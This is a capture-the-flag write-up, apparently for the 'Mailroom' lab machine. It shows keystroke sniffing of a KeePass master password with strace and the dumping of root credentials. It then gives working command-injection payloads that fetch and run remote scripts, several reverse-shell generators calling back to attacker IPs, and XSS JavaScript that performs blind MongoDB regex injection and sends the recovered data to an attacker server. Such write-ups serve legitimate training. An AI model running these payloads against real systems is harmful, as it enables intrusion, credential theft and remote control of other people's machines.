#  This is because the process had not started yet; it is launched once a minute (root's crontab runs /root/kpcli.sh every minute). Wait a moment and retry.

grep "read(0"  /tmp/.pwd.log |grep -v unavailable

#  grep -E "read|write" /tmp/.pwd.log|grep 8192 |grep read|grep -v unavailable

matthew@mailroom:/tmp$ grep 8192 /tmp/.pwd.log |grep "read(0"|grep -v unavailable
read(0, "!", 8192)                      = 1
read(0, "s", 8192)                      = 1
read(0, "E", 8192)                      = 1
read(0, "c", 8192)                      = 1
read(0, "U", 8192)                      = 1
read(0, "r", 8192)                      = 1
read(0, "3", 8192)                      = 1
read(0, "p", 8192)                      = 1
read(0, "4", 8192)                      = 1
read(0, "$", 8192)                      = 1
read(0, "$", 8192)                      = 1
read(0, "w", 8192)                      = 1
read(0, "0", 8192)                      = 1
read(0, "1", 8192)                      = 1
read(0, "\10", 8192)                    = 1
read(0, "r", 8192)                      = 1
read(0, "d", 8192)                      = 1
read(0, "9", 8192)                      = 1
read(0, "\n", 8192)                     = 1
matthew@mailroom:/tmp$ 

root@fv-az345-528:/tmp# grep -E "read|write"   /tmp/123123.txt|grep 8192 |grep read|grep -v unavailable
read(5, "\3\331\242\232g\373K\265\1\0\3\0\2\20\0001\301\362\346\277qCP\276X\5!j\374Z\377\3"..., 8192) = 1998
read(0, "!", 8192)                      = 1
read(0, "s", 8192)                      = 1
read(0, "E", 8192)                      = 1
read(0, "c", 8192)                      = 1
read(0, "U", 8192)                      = 1
read(0, "r", 8192)                      = 1
read(0, "3", 8192)                      = 1
read(0, "p", 8192)                      = 1
read(0, "4", 8192)                      = 1
read(0, "$", 8192)                      = 1
read(0, "$", 8192)                      = 1
read(0, "w", 8192)                      = 1
read(0, "0", 8192)                      = 1
read(0, "1", 8192)                      = 1
read(0, "\10", 8192)                    = 1
read(0, "r", 8192)                      = 1
read(0, "d", 8192)                      = 1
read(0, "9", 8192)                      = 1
read(0, "\n", 8192)                     = 1
read(5, "\3\331\242\232g\373K\265\1\0\3\0\2\20\0001\301\362\346\277qCP\276X\5!j\374Z\377\3"..., 8192) = 1998
read(5, "\npackage Compress::Raw::Zlib;\n\nr"..., 8192) = 8192
read(5, " if $validate && $value !~ /^\\d+"..., 8192) = 8192
read(5, "    croak \"Compress::Raw::Zlib::"..., 8192) = 8192
read(5, "# XML::Parser\n#\n# Copyright (c) "..., 8192) = 8192
read(6, "package XML::Parser::Expat;\n\nuse"..., 8192) = 8192
read(6, ";\n    }\n}\n\nsub position_in_conte"..., 8192) = 8192
read(5, "package MIME::Base64;\n\nuse stric"..., 8192) = 5450
read(6, "\3\331\242\232g\373K\265\1\0\3\0\2\20\0001\301\362\346\277qCP\276X\5!j\374Z\377\3"..., 8192) = 1998
read(6, "", 8192)                       = 0
read(7, "# NOTE: Derived from blib/lib/Te"..., 8192) = 665
read(7, "", 8192)                       = 0
root@fv-az345-528:/tmp# 

\10 is octal 8, the backspace character: "w01" was typed, the 1 was erased, then "rd9" followed.

So the KeePass database's master password is: !sEcUr3p4$$w0rd9
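The following is an added example, not part of the writeup: it reconstructs what was typed into kpcli from the strace log automatically, instead of reading the single-byte reads by eye and applying the backspace by hand. It keeps only 1-byte read(0, ...) lines, decodes strace's C-style escapes (octal such as \10, plus \n, \t, \r, \\ and \"), and applies backspace the way the terminal's line editor did. The sample log is constructed from the lines shown above (with one read on another fd added to show it is ignored); treating DEL (0x7f) as an erase character is an assumption about the terminal, since the log only shows \10.

```javascript
// Added example: rebuild the keystrokes fed to kpcli from an strace -o log.

// One strace line for a read on fd 0, e.g.: read(0, "!", 8192)  = 1
const STDIN_READ = /^read\(0, "((?:\\.|[^"\\])*)", \d+\)\s*=\s*(\d+)$/;

// Decode strace's C-style escapes: \n \t \r \\ \" and octal such as \10 or \001.
function unescapeStrace(s) {
  return s.replace(/\\([0-7]{1,3}|[ntr\\"])/g, (_, e) => {
    switch (e) {
      case "n": return "\n";
      case "t": return "\t";
      case "r": return "\r";
      case "\\": case '"': return e;
      default: return String.fromCharCode(parseInt(e, 8));
    }
  });
}

// Keystrokes as submitted: one string per line ended with Enter; anything typed
// but not yet submitted is returned as the last element. Backspace (0x08, which
// strace prints as \10) and DEL (0x7f, assumed erase character) remove the
// previous character, as the line discipline would.
function recoverTypedLines(straceText) {
  const lines = [];
  let current = "";
  for (const raw of straceText.split("\n")) {
    const m = STDIN_READ.exec(raw.trim());
    if (!m || m[2] !== "1") continue;        // keep only 1-byte keystroke reads on stdin
    const ch = unescapeStrace(m[1]);
    if (ch === "\n" || ch === "\r") { lines.push(current); current = ""; }
    else if (ch === "\b" || ch === "\x7f") current = current.slice(0, -1);
    else current += ch;
  }
  if (current) lines.push(current);
  return lines;
}

// Constructed sample, assembled from the log lines shown above.
const SAMPLE_STRACE = [
  'read(5, "\\3\\331\\242\\232g\\373K\\265\\1\\0\\3\\0"..., 8192) = 1998',
  'read(0, "!", 8192)                      = 1',
  'read(0, "s", 8192)                      = 1',
  'read(0, "E", 8192)                      = 1',
  'read(0, "c", 8192)                      = 1',
  'read(0, "U", 8192)                      = 1',
  'read(0, "r", 8192)                      = 1',
  'read(0, "3", 8192)                      = 1',
  'read(0, "p", 8192)                      = 1',
  'read(0, "4", 8192)                      = 1',
  'read(0, "$", 8192)                      = 1',
  'read(0, "$", 8192)                      = 1',
  'read(0, "w", 8192)                      = 1',
  'read(0, "0", 8192)                      = 1',
  'read(0, "1", 8192)                      = 1',
  'read(0, "\\10", 8192)                    = 1',
  'read(0, "r", 8192)                      = 1',
  'read(0, "d", 8192)                      = 1',
  'read(0, "9", 8192)                      = 1',
  'read(0, "\\n", 8192)                     = 1',
].join("\n");

console.log(recoverTypedLines(SAMPLE_STRACE));
```

Point it at the real file with recoverTypedLines(require("fs").readFileSync("/tmp/.pwd.log", "utf8")); the grep "read(0" | grep -v unavailable filter used above is no longer needed because the regex already selects the stdin reads.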

As below: there is no need to install kpcli yourself; the target already has it and it can be used directly.

keepass2 is the GUI tool; it was not needed this time.

Installing KeePass on Ubuntu 20.04:
sudo apt-add-repository ppa:jtaylor/keepass;\
sudo apt-get update && sudo apt-get upgrade;\
sudo apt-get install keepass2 -y;\
sudo apt install kpcli  -y;


Run keepass2:

root@fv-az345-528:/tmp# keepass2 --version
KeePass 2.45
Copyright ? 2003-2020 Dominik Reichl
root@fv-az345-528:/tmp# 

kpcli  --kdb /tmp/personal.kdbx
ls
cd Root/
ls
show -f -a 4
quit




kpcli:/> cd Root/
kpcli:/Root> ls
=== Entries ===
0. food account                                            door.dash.local
1. GItea Admin account                                    git.mailroom.htb
2. gitea database password                                                
3. My Gitea Account                                       git.mailroom.htb
4. root acc                                                               
kpcli:/Root> show -f -a 4

Title: root acc
Uname: root
 Pass: a$gBa3!GA8
  URL: 
Notes: root account for sysadmin jobs
Icon#: 0
Creat: 2023-03-15 21:43:57
Modif: 2023-03-15 21:44:42
Xpire: Never

kpcli:/Root> quit


matthew@mailroom:~$ kpcli  --kdb ~/personal.kdbx 
Please provide the master password: *************************

KeePass CLI (kpcli) v3.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> ls
=== Groups ===
Root/
kpcli:/> cd Root/
kpcli:/Root> ls
=== Entries ===
0. food account                                            door.dash.local
1. GItea Admin account                                    git.mailroom.htb
2. gitea database password                                                
3. My Gitea Account                                       git.mailroom.htb
4. root acc                                                               
kpcli:/Root> show -a -f 4

Title: root acc
Uname: root
 Pass: a$gBa3!GA8
  URL: 
Notes: root account for sysadmin jobs
Icon#: 0
Creat: 2023-03-15 21:43:57
Modif: 2023-03-15 21:44:42
Xpire: Never

kpcli:/Root> quit
matthew@mailroom:~$ 

matthew@mailroom:/tmp$ su - 
Password: 
root@mailroom:~# ls
cleanup.sh  cleanup.sh.bak  containers  kpcli.sh  matthew_kpcli.py  matthew_kpcli.py.bak  personal.kdbx  personal.kdbx.bak  root.txt
root@mailroom:~# cat root.txt 
7fe0c9a1297e4b3fb9ab8259c67c63a1
root@mailroom:~# 
root@mailroom:~# docker ps -a
CONTAINER ID   IMAGE                    COMMAND                  CREATED        STATUS        PORTS                               NAMES
ed9dafc5f146   containers_sites         "docker-php-entrypoi…"   14 hours ago   Up 14 hours   0.0.0.0:80->80/tcp, :::80->80/tcp   containers_sites_1
be13e7868b63   gitea/gitea:1.18         "/usr/bin/entrypoint…"   14 hours ago   Up 14 hours   22/tcp, 3000/tcp                    containers_gitea_1
a792a1685ae4   postgres:15.1-bullseye   "docker-entrypoint.s…"   14 hours ago   Up 14 hours   5432/tcp                            containers_db_1
178ce6c64a6b   mongo:4.2.23             "docker-entrypoint.s…"   14 hours ago   Up 14 hours   27017/tcp                           containers_mongodb_1
root@mailroom:~# id
uid=0(root) gid=0(root) groups=0(root)
root@mailroom:~# 


 # This step should not be needed anymore
 # docker exec -it containers_sites_1  /bin/bash -c 'chmod +s /bin/bash'
  

Guess: once root logs in, the perl and kpcli processes disappear.

Looking below, the guess was wrong: kpcli is started every minute and the cleanup runs every 3 minutes.

root@mailroom:~# cat ~/cleanup.sh
#!/bin/bash

# Clear inquiries
/usr/bin/rm -rf /root/containers/sites/mailroom/inquiries/*

# Copy back template inquiry
/usr/bin/cp /root/containers/5657465f7712d50b2aaceaa09453c71f.html /root/containers/sites/mailroom/inquiries/

# Restore gitea
/usr/bin/rm -rf /root/containers/gitea/*
/usr/bin/cp -r /root/containers/gitea_backup/* /root/containers/gitea/

# Clear tmp files
/usr/bin/rm -rf /tmp/*

# Clear past emails
echo "$(tail -n 10 /var/mail/tristan)" > /var/mail/tristan
root@mailroom:~# crontab  -l
# Edit this file to introduce tasks to be run by cron.
# 
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
# 
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
# 
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
# 
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
# 
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
# 
# For more information see the manual pages of crontab(5) and cron(8)
# 
# m h  dom mon dow   command
*/3 * * * * /root/cleanup.sh >/dev/null 2>&1
*/1 * * * * /root/kpcli.sh >/dev/null 2>&1
root@mailroom:~# 

A look at the target VM's resources:

root@mailroom:/tmp# df -h
Filesystem                         Size  Used Avail Use% Mounted on
udev                               1.9G     0  1.9G   0% /dev
tmpfs                              391M   41M  350M  11% /run
/dev/mapper/ubuntu--vg-ubuntu--lv  7.2G  5.4G  1.5G  79% /
tmpfs                              2.0G     0  2.0G   0% /dev/shm
tmpfs                              5.0M     0  5.0M   0% /run/lock
tmpfs                              2.0G     0  2.0G   0% /sys/fs/cgroup
/dev/sda2                          219M  108M   93M  54% /boot
overlay                            7.2G  5.4G  1.5G  79% /var/lib/docker/overlay2/68f15147525c63cc344606e5b29fc4ec921f656f55260b4600bc178cb459378a/merged
overlay                            7.2G  5.4G  1.5G  79% /var/lib/docker/overlay2/f029f39ea36301cfff86726028ab27e9734acd9199aee23fc6bae7334b411020/merged
shm                                 64M  1.1M   63M   2% /var/lib/docker/containers/a792a1685ae42e12a2e997b16ba6e2d3bd8eb2fb9009379ed9aea1b2f087881a/mounts/shm
shm                                 64M     0   64M   0% /var/lib/docker/containers/178ce6c64a6be27a55a5dbb37dde1d2786c6e610c78e36c911e159dee2573f1c/mounts/shm
overlay                            7.2G  5.4G  1.5G  79% /var/lib/docker/overlay2/0bd824ad9f75604012958f36946a505389003d86fca4aeebafee5633ed3cf974/merged
shm                                 64M     0   64M   0% /var/lib/docker/containers/be13e7868b6371a6be9a28388202b131848556634f13b20060263e1571460ca3/mounts/shm
overlay                            7.2G  5.4G  1.5G  79% /var/lib/docker/overlay2/15152d7d89f89bb8394707d53a1787872a40454a4d6b656724f11167ca53b6e5/merged
shm                                 64M     0   64M   0% /var/lib/docker/containers/ed9dafc5f146dd54611d8e00e4f8cf5a302418effcf64de39f628f9c50599600/mounts/shm
tmpfs                              391M     0  391M   0% /run/user/1000
tmpfs                              391M     0  391M   0% /run/user/0
tmpfs                              391M     0  391M   0% /run/user/1001
root@mailroom:/tmp# free -m
              total        used        free      shared  buff/cache   available
Mem:           3901         600        1439          56        1860        2953
Swap:          2047           0        2047
root@mailroom:/tmp# 

Fetching the source of http://staff-review-panel.mailroom.htb/inspect.php:

docker cp containers_sites_1:/var/www/staffroom/inspect.php /home/

scp -P 40022 -o StrictHostKeyChecking=no /home/inspect.php [email protected]:/tmp/

With the HTML stripped out, it looks like this:

<?php
session_start(); // Start a session
// Check if authorized
if (!isset($_SESSION['logged_in']) || $_SESSION['logged_in'] !== true) {
  header('Location: index.php'); // The user is NOT logged in, redirect back to the login page
  exit;
}

$data = '';
if (isset($_POST['inquiry_id'])) {
  $inquiryId = preg_replace('/[\$<>;|&{}\(\)\[\]\'\"]/', '', $_POST['inquiry_id']);
  $contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");

  // Parse the data between <p class="lead mb-0"> and </p>
  $start = strpos($contents, '<p class="lead mb-0">');
  if ($start === false) {
    // Data not found
    $data = 'Inquiry contents parsing failed';
  } else {
    $end = strpos($contents, '</p>', $start);
    $data = htmlspecialchars(substr($contents, $start + 21, $end - $start - 21));
  }
}

$status_data = '';
if (isset($_POST['status_id'])) {
  $inquiryId = preg_replace('/[\$<>;|&{}\(\)\[\]\'\"]/', '', $_POST['status_id']);
  $contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");

  // Parse the data between <p class="lead mb-1"> and </p>
  $start = strpos($contents, '<p class="lead mb-1">');
  if ($start === false) {
    // Data not found
    $status_data = 'Inquiry contents parsing failed';
  } else {
    $end = strpos($contents, '</p>', $start);
    $status_data = htmlspecialchars(substr($contents, $start + 21, $end - $start - 21));
  }
}

?> 
                <?php echo $_SESSION['name']; ?> 
                  <?php echo $data; ?> 
                  <?php echo $status_data; ?> 

There is a session check; the two key lines are these (the blacklist drops $ < > ; | & { } ( ) [ ] ' " but leaves backticks, spaces and newlines untouched):

$inquiryId = preg_replace('/[\$<>;|&{}\(\)\[\]\'\"]/', '', $_POST['inquiry_id']);
$contents = shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html");

In the source video the file is first downloaded with curl into /tmp and then run with bash; I came up with a clumsy way that does it in a single request:

The contents of r0 (a generator script run on the attacker box; it writes /tmp/r0.sh, which is then served over HTTP):


# attacker's tun0 address, used as the callback target
myip2=$(  ip addr show tun0 |grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' |head -n 1);

# the script the target will download and execute
cat <<EOF>/tmp/r0.sh
id;
touch /tmp/XYZ;
setsid nc -lnvvp  10080&
bash -i >& /dev/tcp/$myip2/88 0>&1
EOF

cat /tmp/r0.sh;

The decoded inquiry_id value (each backtick group runs while the shell expands the argument, before cat even starts, so it does not matter that cat fails afterwards):

`sleep 2``curl -o /tmp/AA5 http://10.10.14.37:77/r0.sh``bash /tmp/AA5``echo 1`

curl -v -d "inquiry_id=\`sleep+2\`\`curl+-o+/tmp/1r2+http://10.10.14.37:77/r0.sh\`\`bash+/tmp/1r2\`\`echo+1\`" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" http://staff-review-panel.mailroom.htb/inspect.php

The nc inside the container is the OpenBSD variant, which has no -e option, so nc alone can only open a bind listener and cannot spawn a reverse shell; that is why the callback uses bash's /dev/tcp redirection instead.

root@ed9dafc5f146:/var/www/html# which nc
/bin/nc
root@ed9dafc5f146:/var/www/html#
root@ed9dafc5f146:/var/www/html# nc -e
nc: invalid option -- 'e'
usage: nc [-46CDdFhklNnrStUuvZz] [-I length] [-i interval] [-M ttl]
      [-m minttl] [-O length] [-P proxy_username] [-p source_port]
      [-q seconds] [-s sourceaddr] [-T keyword] [-V rtable] [-W recvlimit]
      [-w timeout] [-X proxy_protocol] [-x proxy_address[:port]]
      [destination] [port]
root@ed9dafc5f146:/var/www/html#

# what would have been used if -e were supported:
# nc  10.10.14.37  88 -e /bin/sh

Because newlines are not filtered either, we can also use them to run several statements: the backtick group now spans several lines, and each line inside it is a separate command:


curl -v --data-binary "inquiry_id=\`sleep+12
curl+-o+/tmp/3r2+http://10.10.14.37:77/r0.sh
bash+/tmp/3r2
echo+-n+1\`" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" \
http://staff-review-panel.mailroom.htb/inspect.php


The following variant failed to call back; the reason turns out to be where the substituted text lands in the command:

Submitted parameter:

`  ``curl http://127.0.0.1:77/r2.sh``  `


#  shell_exec("$inquiryId");
# works with the line above



# the following does not
#  shell_exec("cat $inquiryId");

The shell does run `curl ...` during expansion, but what the substitution yields, the text of r2.sh (`bash -c {curl,http://...:77/r1.sh}|bash`), is only pasted back into the command line as data. With a bare shell_exec("$inquiryId") that text sits at command position and is executed; with the cat prefix it merely becomes arguments to cat (cat /var/www/mailroom/inquiries/bash -c {curl,...}|bash.html), so nothing in r2.sh ever runs.


curl -v -d "inquiry_id=\`+\`\`curl+http://10.10.14.37:77/r2.sh\`\`+\`" \
-H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878" \
http://staff-review-panel.mailroom.htb/inspect.php

The generator for r1.sh (run on the attacker box):

myip2=$(ip addr show tun0 |grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' |head -n 1);
 
 
cat <<EOF>/tmp/r1.sh
bash -i >& /dev/tcp/$myip2/88 0>&1
EOF

cat /tmp/r1.sh;

The generator for r2.sh (run on the attacker box):

myip2=$(ip addr show tun0 |grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' |head -n 1);

cat <<EOF>/tmp/r2.sh
bash -c {curl,http://$myip2:77/r1.sh}|bash
EOF

cat /tmp/r2.sh;

Combining this with the newline trick for running several statements, another approach came to mind:

Nothing needs to be written to disk on the target; the statements run directly. Note how r8.sh is built: the reverse-shell line is base64-encoded so it becomes a single token with no spaces or redirection characters, and the decoding pipeline is written as `{echo,$w2}|{base64,-d}|{bash,-i}` because the output of a command substitution is split into words before it runs. A pipeline written with ordinary spaces would be torn into separate words (with `|` as a literal word), while each brace group is one word that `bash -c` expands back into a proper command.

First generate r8.sh on the local Kali box:

myip2=$(ip addr show tun0 |grep -Po '(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])(\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)){3}' |head -n 1);
 

w2=`echo "bash -i >& /dev/tcp/$myip2/88 0>&1"|base64`
echo $w2;
echo $w2|base64 -d;

cat <<EOF>/tmp/r8.sh
bash -c {echo,$w2}|{base64,-d}|{bash,-i}
EOF

cat /tmp/r8.sh;

Then, from an SSH session as [email protected] (the panel only accepts connections from localhost), send the curl request:

curl -v -d "inquiry_id=../../../../proc/cpuinfo
\`+\`\`curl+http://10.10.14.50:30088/r8.sh\`\`+\`
touch+/tmp/" -H "Cookie: PHPSESSID=5539dfbf91caa882aa3368627bf56878"  \
http://staff-review-panel.mailroom.htb/inspect.php

Reverse shell obtained.
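The behaviours used above (a backtick group that runs during expansion, a fetched script whose text is merely substituted as data, the newline that moves that text into command position, and the reason r8.sh uses `{a,b}` brace groups instead of spaces) can all be reproduced locally. The block below is an added example, not code from this writeup or from the box: it re-implements the inspect.php blacklist with sed, splices the filtered value into the same `cat .../<id>.html` string and hands it to `sh -c` the way shell_exec() does. The scratch directory from mktemp, the marker files and the constructed script files (a local `cat` of them stands in for `curl` to the attacker's server) are all assumptions made for the demonstration. It needs a POSIX sh and, for the last case, bash.

```sh
#!/bin/sh
# Added example, not code from the original writeup or from the box.
# Local model of the inspect.php sink: PHP blacklist -> cat string -> sh -c.

# Same character class as preg_replace('/[\$<>;|&{}\(\)\[\]\'\"]/', '', ...):
# backticks, spaces, commas and newlines are deliberately left alone.
php_filter() {
    printf '%s\n' "$1" | sed 's/[][$<>;|&{}()'"'"'"]//g'
}

# shell_exec("cat /var/www/mailroom/inquiries/$inquiryId.html"), with the
# inquiries directory replaced by a scratch directory passed as $1.
inspect_php() {
    sh -c "cat $1/$(php_filter "$2").html" >/dev/null 2>&1 || true
}

# Case 1: a backtick group is executed while the shell expands the cat
# argument, so its side effect happens even though cat itself fails.
# This is the one-request "`sleep 2``curl -o ...``bash ...`" trick.
side_effect_runs() {
    d=$(mktemp -d)
    inspect_php "$d" "\`touch $d/hit\`"
    [ -f "$d/hit" ]
}

# Case 2: the OUTPUT of a substitution is only text (here an argument to
# cat); it is never parsed as a new command. Fetching a script and letting
# its contents be substituted therefore does nothing (the r2.sh attempt).
substituted_text_is_data() {
    d=$(mktemp -d)
    inspect_php "$d" "\`echo touch $d/hit\`"
    [ ! -f "$d/hit" ]
}

# Case 3: the newline survives the filter, so a substitution at the start
# of its own line expands into command position and its output is run.
newline_puts_output_in_command_position() {
    d=$(mktemp -d)
    inspect_php "$d" "x
\`echo touch $d/hit\`
y"
    [ -f "$d/hit" ]
}

# Case 4: why the fetched script is written with {a,b} instead of spaces.
# Unquoted substitution output is word-split and "|" becomes a literal word,
# so a plain pipeline is mangled; with brace groups the whole pipeline is one
# word that "bash -c" brace-expands and runs as intended.
# "cat <file>" stands in for "curl http://attacker/r8.sh".
brace_expansion_keeps_pipeline_intact() {
    d=$(mktemp -d)
    printf '%s\n' "bash -c echo hi | tr a-z A-Z | tee $d/plain" >"$d/plain.sh"
    printf '%s\n' "bash -c {echo,hi}|{tr,a-z,A-Z}|{tee,$d/braced}" >"$d/braced.sh"
    inspect_php "$d" "x
\`cat $d/plain.sh\`
\`cat $d/braced.sh\`
y"
    [ ! -f "$d/plain" ] && [ "$(cat "$d/braced")" = "HI" ]
}

for c in side_effect_runs substituted_text_is_data \
         newline_puts_output_in_command_position \
         brace_expansion_keeps_pipeline_intact; do
    if "$c"; then echo "$c: behaves as described"; else echo "$c: UNEXPECTED"; fi
done
```

Run it with `sh example.sh`; each case reports whether it behaved as described. Case 2 is the failed r2.sh attempt, case 3 the working newline form, and case 4 shows why the plain `curl | bash` pipeline had to be rewritten with brace groups.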

Tip:

  When brute-forcing the username and password through the XSS, how can the run last longer than 30 seconds?

  Testing showed that the Firefox on the target does not block window.open popups, so a popup can be used to stretch the time; many browser pages can even be opened, with Kali acting as a reverse proxy to reach sites on the internet.

The contact-form post below carries two script tags: loader_user.js does the work, and the second one points at a PHP server on port 8090 whose response is deliberately delayed:

curl -v -d 'email=qax%40gmail.com&title=maga2023&message=<script+src%3d"http%3a//10.10.14.50:30088/loader_user.js"></script><script+src%3d"http%3a//10.10.14.50:8090/?c=123"></script>'   http://mailroom.htb/contact.php

The index.php for that PHP server; set_time_limit(300) and sleep(120) make it answer the second <script> request only after two minutes:

echo "<?php header('Content-Type: application/x-javascript; charset=UTF-8');\
header('Access-Control-Allow-Origin: *');\
header('Access-Control-Allow-Headers: *');\
set_time_limit(300);sleep(120);\
echo 'console.log(120);';">/tmp/index.php ;

Source of loader_user.js:

function dateTimeToStringS(date, format) {
  if (date) {
    var o = {
      "M+": date.getMonth() + 1, // month
      "d+": date.getDate(), // day
      "h+": date.getHours() % 12 == 0 ? 12 : date.getHours() % 12, // 12-hour clock
      "H+": date.getHours(), // 24-hour clock
      "m+": date.getMinutes(), // minute
      "s+": date.getSeconds(), // second
      "q+": Math.floor((date.getMonth() + 3) / 3), // quarter
      "S": date.getMilliseconds() // ms
    };
    var week = {
      "0": "\u65e5",
      "1": "\u4e00",
      "2": "\u4e8c",
      "3": "\u4e09",
      "4": "\u56db",
      "5": "\u4e94",
      "6": "\u516d"
    };
    if (/(y+)/.test(format)) {
      format = format.replace(RegExp.$1, (date.getFullYear() + "").substr(4 - RegExp.$1.length));
    }
    if (/(E+)/.test(format)) {
      format = format.replace(RegExp.$1, ((RegExp.$1.length > 1) ? (RegExp.$1.length > 2 ? "\u661f\u671f" : "\u5468") : "") + week[date.getDay() + ""]);
    }
    for (var k in o) {
      if (new RegExp("(" + k + ")").test(format)) {
        format = format.replace(RegExp.$1, (RegExp.$1.length == 1) ? (o[k]) : (("00" + o[k]).substr(("" + o[k]).length)));
      }
    }
    return format;
  }
}

window.onunload=function()
{
fetch("http://10.10.14.50:30088/guess_username.js?fetch_unload_t="+dateTimeToStringS(new Date(),"yyyy-MM-dd-HH:mm:ss.S")  );
}

window.onbeforeunload=function()
{
fetch("http://10.10.14.50:30088/guess_username.js?fetch_beforeunload_t="+dateTimeToStringS(new Date(),"yyyy-MM-dd-HH:mm:ss.S")  );
}

fetch("http://10.10.14.50:30088/guess_username.js?fetch_first_t="+dateTimeToStringS(new Date(),"yyyy-MM-dd-HH:mm:ss.S")  );
setTimeout(function(){window.open("http://10.10.14.50:30088/loader_html.html?time="+dateTimeToStringS(new Date(),"yyyy-MM-dd-HH:mm:ss.S")  );},10000);


setTimeout(function(){
opener=null;
open('','_self');
close();
},60000);
//driver.set_page_load_timeout(30); the bot closes the page after 30 seconds (the python ai.py process exits), so the 60-second timer is never reached

Source of loader_html.html:

<!DOCTYPE html>
<html lang="en">
    <head>
        <title>guess_username</title>
    </head>
    <body>
    
    <script src='http://10.10.14.50:30088/guess_username.js'></script>
    <script src='http://10.10.14.50:30088/guess_password.js'></script>
    
    </body>
</html>

Updated guess_username.js source:

/*
fetch("http://10.10.14.50:30088/xss.js?gu="+100*Math.random()).then(
(res3)=>{    var t2=res3.text();
    t2.then(   ( y3)=>
    {
    //console.log(y3);
    eval( y3 ) ; 
    }
     );
    //console.log(res3,t2);
    return t2; }
);
*/


// Blind MongoDB regex injection against auth.php: email[$regex] makes the
// server-side query match ".*<suffix>@mailroom.htb", so the username is
// recovered one character at a time from the right, starting at the "@".
async function callAuth(mail) {
    var http = new XMLHttpRequest();
    http.open('POST', "http://staff-review-panel.mailroom.htb/auth.php", true);
    http.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
    http.onload = function () {
        if (/"success":true/.test(this.responseText)) {
            notify(mail);          // report the longer matching suffix
            cal(chars88, mail);    // and try to extend it by one more character
        }
    };
    // Regex metacharacters in the guessed suffix are escaped so that e.g. "+"
    // cannot turn ".*" into a possessive quantifier and yield a false match;
    // encodeURIComponent keeps "+", "#" and "%" intact in the form body.
    var pattern = ".*" + mail.replace(/[.*+?^${}()|[\]\\]/g, "\\$&") + "@mailroom.htb";
    http.send("email[$regex]=" + encodeURIComponent(pattern) + "&password[$ne]=abc");
}
// Exfiltrate each confirmed suffix as a query string to the attacker's server.
function notify(mail) {
    fetch("http://10.10.14.50:30088/r8.sh?" + mail);
}
// Try every candidate character in front of the current suffix; all requests
// are fired concurrently and the success branch drives the next round.
function cal(chars, mail) {
    for (var i = 0; i < chars.length; i++) {
        callAuth(chars[i] + mail)
    }
}
var chars88 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%'()+, -/:;<=>@[\]_`{}~";
cal(chars88, "")


 

console.log("5201314_maga");
fetch("http://10.10.14.50:30088/guess_username.js?in_fetch_guest_username.js="+100*Math.random());


window.onunload=function()
{
fetch("http://10.10.14.50:30088/guess_username.js?fetch_unload_ut="+100*Math.random());
}

window.onbeforeunload=function()
{
fetch("http://10.10.14.50:30088/guess_username.js?fetch_beforeunload_ut="+100*Math.random()  );
}

setTimeout(function(){
opener=null;
open('','_self');
close();
},60000);// close after 60 seconds; the whole firefox-esr process then exits


[2023-05-03T12:03:31.693Z]  "GET /loader_user.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[Wed May  3 12:03:31 2023] 10.10.11.209:39216 Accepted
[2023-05-03T12:03:31.861Z]  "GET /guess_username.js?fetch_first_t=2023-05-03-12:03:30.634" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:41.920Z]  "GET /loader_html.html?time=2023-05-03-12:03:40.638" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:42.036Z]  "GET /guess_username.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:42.111Z]  "GET /guess_password.js" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:43.195Z]  "GET /guess_username.js?in_fetch_guest_username.js=32.70788844267638" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:43.572Z]  "GET /guess_password.js?6" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:44.285Z]  "GET /guess_password.js?69" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:45.954Z]  "GET /guess_password.js?69t" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:46.869Z]  "GET /guess_password.js?69tr" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
[2023-05-03T12:03:48.451Z]  "GET /guess_password.js?69tri" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
